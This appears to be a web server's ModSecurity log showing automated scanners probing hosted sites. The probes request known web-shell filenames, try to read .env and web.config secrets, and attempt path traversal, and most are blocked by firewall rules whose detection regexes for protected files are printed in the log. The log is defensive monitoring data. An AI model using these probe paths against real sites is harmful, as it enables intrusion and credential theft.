[Tue May 26 13:48:30.138554 2026] [security2:error] [pid 544395:tid 544651] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXVhmrs7g3RMCdp8XxEwAAAH4"]
[Tue May 26 13:48:30.216894 2026] [security2:error] [pid 555743:tid 555938] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXVcjqAquC0YaxQjCpawAAAUs"]
[Tue May 26 13:48:30.368004 2026] [security2:error] [pid 544395:tid 544547] [client 15.235.169.50:56528] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/pwnd/autoload_classmap.php"] [unique_id "ahVXVhmrs7g3RMCdp8XxGwAAABY"]
[Tue May 26 13:48:30.376300 2026] [security2:error] [pid 555743:tid 555931] [client 4.201.75.230:5298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/info.php"] [unique_id "ahVXVsjqAquC0YaxQjCpewAAAUQ"]
[Tue May 26 13:48:30.428728 2026] [security2:error] [pid 544395:tid 544600] [client 66.249.89.140:64955] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVXVRmrs7g3RMCdp8XxBQAAAEs"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 13:48:30.600720 2026] [security2:error] [pid 544395:tid 544586] [client 20.205.111.246:1033] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/abcd.php"] [unique_id "ahVXVhmrs7g3RMCdp8XxHgAAAD0"]
[Tue May 26 13:48:30.686079 2026] [security2:error] [pid 555743:tid 555963] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXVsjqAquC0YaxQjCpkwAAAWQ"]
[Tue May 26 13:48:30.842005 2026] [fcgid:warn] [pid 555743:tid 555995] (70014)End of file found: [client 103.4.251.33:30172] mod_fcgid: can't get data from http client
[Tue May 26 13:48:30.863598 2026] [security2:error] [pid 555743:tid 555874] [client 15.235.169.50:56606] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/evita/about.php"] [unique_id "ahVXVsjqAquC0YaxQjCpsQAAAQs"]
[Tue May 26 13:48:30.982480 2026] [security2:error] [pid 544395:tid 544528] [client 66.249.89.128:47302] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVXVRmrs7g3RMCdp8XxEQAAAAM"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 13:48:31.295522 2026] [fcgid:warn] [pid 544395:tid 544555] (70014)End of file found: [client 103.4.251.33:30242] mod_fcgid: can't get data from http client
[Tue May 26 13:48:31.308396 2026] [security2:error] [pid 555743:tid 555986] [client 20.205.111.246:1652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/al.php"] [unique_id "ahVXV8jqAquC0YaxQjCp_AAAAXs"]
[Tue May 26 13:48:31.355922 2026] [security2:error] [pid 555743:tid 555886] [client 15.235.169.50:56686] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/ID3/wp-corn-sample.php"] [unique_id "ahVXV8jqAquC0YaxQjCqDwAAARc"]
[Tue May 26 13:48:31.390167 2026] [security2:error] [pid 544395:tid 544541] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXVxmrs7g3RMCdp8XxVwAAABA"]
[Tue May 26 13:48:31.555980 2026] [security2:error] [pid 555743:tid 555891] [client 66.249.89.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVXVsjqAquC0YaxQjCpkAAAARw"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 13:48:31.777023 2026] [security2:error] [pid 544395:tid 544527] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXVxmrs7g3RMCdp8XxhAAAAAI"]
[Tue May 26 13:48:31.831442 2026] [security2:error] [pid 544395:tid 544540] [client 15.235.169.50:56762] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/ID3/upfile.php"] [unique_id "ahVXVxmrs7g3RMCdp8XxiQAAAA8"]
[Tue May 26 13:48:31.992545 2026] [security2:error] [pid 544395:tid 544635] [client 20.205.111.246:6217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/alfa.php"] [unique_id "ahVXVxmrs7g3RMCdp8XxjAAAAG4"]
[Tue May 26 13:48:32.014857 2026] [fcgid:warn] [pid 555743:tid 555888] (70014)End of file found: [client 103.4.250.155:3904] mod_fcgid: can't get data from http client
[Tue May 26 13:48:32.019853 2026] [security2:error] [pid 555743:tid 555926] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXV8jqAquC0YaxQjCqTQAAAT8"]
[Tue May 26 13:48:32.099580 2026] [security2:error] [pid 555743:tid 555892] [client 66.249.89.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVXV8jqAquC0YaxQjCp8gAAAR0"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 13:48:32.256411 2026] [security2:error] [pid 555743:tid 555925] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXWMjqAquC0YaxQjCqVQAAAT4"]
[Tue May 26 13:48:32.296251 2026] [security2:error] [pid 555743:tid 555999] [client 15.235.169.50:56823] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/Requests/about.php"] [unique_id "ahVXWMjqAquC0YaxQjCqWgAAAYg"]
[Tue May 26 13:48:32.693613 2026] [security2:error] [pid 555743:tid 555946] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXWMjqAquC0YaxQjCqWQAAAVM"]
[Tue May 26 13:48:32.694929 2026] [security2:error] [pid 555743:tid 555945] [client 20.205.111.246:1598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/as.php"] [unique_id "ahVXWMjqAquC0YaxQjCqbgAAAVI"]
[Tue May 26 13:48:32.699149 2026] [security2:error] [pid 555743:tid 555902] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXWMjqAquC0YaxQjCqbQAAASc"]
[Tue May 26 13:48:32.758511 2026] [security2:error] [pid 555743:tid 555922] [client 15.235.169.50:56874] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/menu.php"] [unique_id "ahVXWMjqAquC0YaxQjCqeAAAATs"]
[Tue May 26 13:48:33.238464 2026] [security2:error] [pid 555743:tid 555927] [client 15.235.169.50:56958] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/function.php"] [unique_id "ahVXWcjqAquC0YaxQjCqpAAAAUA"]
[Tue May 26 13:48:33.389050 2026] [security2:error] [pid 555743:tid 555987] [client 20.205.111.246:6247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/aa.php"] [unique_id "ahVXWcjqAquC0YaxQjCqqAAAAXw"]
[Tue May 26 13:48:33.411659 2026] [security2:error] [pid 555743:tid 555995] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXWcjqAquC0YaxQjCqpwAAAYQ"]
[Tue May 26 13:48:33.652460 2026] [security2:error] [pid 555743:tid 555892] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXWcjqAquC0YaxQjCqwgAAAUc"]
[Tue May 26 13:48:33.703899 2026] [security2:error] [pid 555743:tid 555952] [client 15.235.169.50:57033] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/m.php"] [unique_id "ahVXWcjqAquC0YaxQjCq0AAAAVk"]
[Tue May 26 13:48:33.755531 2026] [security2:error] [pid 544395:tid 544634] [client 173.252.69.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVXWRmrs7g3RMCdp8XxuwAAAG0"]
[Tue May 26 13:48:33.764607 2026] [security2:error] [pid 544395:tid 544597] [client 173.252.69.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVXWRmrs7g3RMCdp8XxuAAAAEg"]
[Tue May 26 13:48:33.908343 2026] [security2:error] [pid 555743:tid 555972] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXWcjqAquC0YaxQjCq4wAAAW0"]
[Tue May 26 13:48:34.057832 2026] [security2:error] [pid 544395:tid 544619] [client 20.205.111.246:1030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/abc.php"] [unique_id "ahVXWhmrs7g3RMCdp8XxzgAAAF4"]
[Tue May 26 13:48:34.183430 2026] [security2:error] [pid 555743:tid 555862] [remote 194.59.31.115:54198] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "staging.unsobered.com"] [uri "/.env"] [unique_id "ahVXWsjqAquC0YaxQjCrBAABRXY"]
[Tue May 26 13:48:34.186481 2026] [security2:error] [pid 555743:tid 555884] [client 15.235.169.50:57102] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/images/install.php"] [unique_id "ahVXWsjqAquC0YaxQjCrBgAAARU"]
[Tue May 26 13:48:34.338824 2026] [security2:error] [pid 555743:tid 555869] [remote 194.59.31.115:54198] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:file_name. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:file_name"] [severity "CRITICAL"] [hostname "staging.unsobered.com"] [uri "/pms"] [unique_id "ahVXWsjqAquC0YaxQjCrEgABP30"]
[Tue May 26 13:48:34.429377 2026] [security2:error] [pid 555743:tid 555933] [client 194.59.31.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVXWsjqAquC0YaxQjCrHAAAAUY"]
[Tue May 26 13:48:34.429948 2026] [security2:error] [pid 555743:tid 555909] [client 194.59.31.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVXWsjqAquC0YaxQjCrGgAAAS4"]
[Tue May 26 13:48:34.435985 2026] [security2:error] [pid 555743:tid 555930] [client 194.59.31.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVXWsjqAquC0YaxQjCrGwAAAUM"]
[Tue May 26 13:48:34.441021 2026] [security2:error] [pid 555743:tid 555876] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXWcjqAquC0YaxQjCq8AAAAQ0"]
[Tue May 26 13:48:34.526419 2026] [security2:error] [pid 555743:tid 555910] [client 194.59.31.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVXWsjqAquC0YaxQjCrKwAAAS8"]
[Tue May 26 13:48:34.539677 2026] [security2:error] [pid 555743:tid 555926] [client 194.59.31.115:54198] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "ahVXWsjqAquC0YaxQjCrEQABP3c"]
[Tue May 26 13:48:34.666289 2026] [security2:error] [pid 555743:tid 555879] [client 15.235.169.50:57212] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/set.php"] [unique_id "ahVXWsjqAquC0YaxQjCrQQAAARA"]
[Tue May 26 13:48:34.720236 2026] [security2:error] [pid 555743:tid 555963] [client 20.205.111.246:1582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/av.php"] [unique_id "ahVXWsjqAquC0YaxQjCrSAAAAWQ"]
[Tue May 26 13:48:34.765746 2026] [security2:error] [pid 555743:tid 555925] [client 106.192.248.115:62101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXWsjqAquC0YaxQjCrSwAAAT4"]
[Tue May 26 13:48:34.765891 2026] [security2:error] [pid 555743:tid 555925] [client 106.192.248.115:62101] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXWsjqAquC0YaxQjCrSwAAAT4"]
[Tue May 26 13:48:34.838422 2026] [security2:error] [pid 555743:tid 555948] [client 103.4.251.33:30054] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/crm"] [unique_id "ahVXWsjqAquC0YaxQjCrUQAAAVU"]
[Tue May 26 13:48:34.903357 2026] [security2:error] [pid 555743:tid 555960] [client 103.4.251.33:30176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVXWsjqAquC0YaxQjCrWgAAAWE"]
[Tue May 26 13:48:35.133276 2026] [security2:error] [pid 555743:tid 555951] [client 15.235.169.50:57284] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahVXW8jqAquC0YaxQjCraAAAAVg"]
[Tue May 26 13:48:35.153669 2026] [security2:error] [pid 544395:tid 544599] [client 4.201.75.230:5299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/bless.php"] [unique_id "ahVXWxmrs7g3RMCdp8Xx0QAAAEo"]
[Tue May 26 13:48:35.365537 2026] [security2:error] [pid 555743:tid 555892] [client 5.255.121.146:12290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env"] [unique_id "ahVXW8jqAquC0YaxQjCregAAAR0"]
[Tue May 26 13:48:35.367813 2026] [security2:error] [pid 555743:tid 555901] [client 5.255.121.146:52500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/api/.env"] [unique_id "ahVXW8jqAquC0YaxQjCriwAAASY"]
[Tue May 26 13:48:35.367988 2026] [security2:error] [pid 555743:tid 555927] [client 5.255.121.146:52490] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/app/.env"] [unique_id "ahVXW8jqAquC0YaxQjCrjQAAAUA"]
[Tue May 26 13:48:35.381677 2026] [security2:error] [pid 555743:tid 555912] [client 5.255.121.146:52504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/backend/.env"] [unique_id "ahVXW8jqAquC0YaxQjCrmQAAATE"]
[Tue May 26 13:48:35.421465 2026] [security2:error] [pid 555743:tid 555886] [client 20.205.111.246:1136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/autoload_classmap.php"] [unique_id "ahVXW8jqAquC0YaxQjCrmgAAARc"]
[Tue May 26 13:48:35.622679 2026] [security2:error] [pid 555743:tid 555985] [client 15.235.169.50:57389] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wsa.php"] [unique_id "ahVXW8jqAquC0YaxQjCrpQAAAXo"]
[Tue May 26 13:48:35.887538 2026] [security2:error] [pid 555743:tid 555964] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXW8jqAquC0YaxQjCrnQAAAWU"]
[Tue May 26 13:48:36.096347 2026] [security2:error] [pid 555743:tid 555959] [client 15.235.169.50:57468] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/xleet.php"] [unique_id "ahVXXMjqAquC0YaxQjCruQAAAWA"]
